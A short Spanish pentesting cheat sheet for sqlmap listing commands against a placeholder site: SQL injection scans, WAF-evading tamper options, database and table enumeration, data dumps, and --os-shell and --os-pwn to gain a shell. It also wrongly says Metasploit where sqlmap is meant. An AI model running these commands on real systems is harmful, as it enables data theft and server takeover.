SQLmap
tools
sqlmap es una utilidad de software para el descubrimiento automatizado de vulnerabilidades de inyección SQL en aplicaciones web.
antes de automatizar tareas con SQLmap, debes entender a la inyección SQL:
Instalación de SQLmap
Metasploit viene instalado por defecto en sistemas de pentesting como ParrotOS o Kali Linux, puedes descargarlo manualmente en:
Comandos y uso de SQLmap
python sqlmap.py -h # comando de ayuda# Escaneo basico buscando vulnerabilidades en parametros
sqlmap -u "http://victima.com/product.php?id=1"
# Forzar metodo POST
sqlmap -u "http://victima.com/login.php" --data="user=admin&pass=1234"
# inyeccion en Cookies
sqlmap -u "http://victima.com/profile.php?id=2" --cookie="PHPSESSID=abc123"
# Escaneo agresivo (mas detectable)
sqlmap -u "http://victima.com/product.php?id=1" --level=5 --risk=3
# enumerar bases de datos
sqlmap -u "http://victima.com/product.php?id=1" --dbs
# Haciendo fuerza bruta de parametros ocultos
sqlmap -u "http://victima.com/page.php" --crawl=3
# Enumerar tablas de una base de datos
sqlmap -u "http://victima.com/product.php?id=1" -D nombre_db_aqui --tables
# Enumerar columnas de una tabla
sqlmap -u "http://victima.com/product.php?id=1" -D nombre_db_aqui -T nombre_tabla_aqui --columns
# Extraer datos
sqlmap -u "http://victima.com/product.php?id=1" -D nombre_db_aqui -T nombre_tabla_aqui -C columnaejemplo,columnaejemplo2 --dump
# escaneo con scripts en --tamper modificados para burlar WAFs
sqlmap -u "http://victima.com/index.php?id=1" --tamper=between
# Ejecucion de comandos (si la base de datos tiene permisos)
sqlmap -u "http://victima.com/product.php?id=1" --os-shell
# Subir una shell
sqlmap -u "http://victima.com/product.php?id=1" --os-pwn
# Guardar resultados de escaneo
sqlmap -u "http://victima.com/product.php?id=1" -o --batch
# Guardar resultados de escaneo en formato especifico
sqlmap -u "http://victima.com/product.php?id=1" --dump-format=CSVLast updated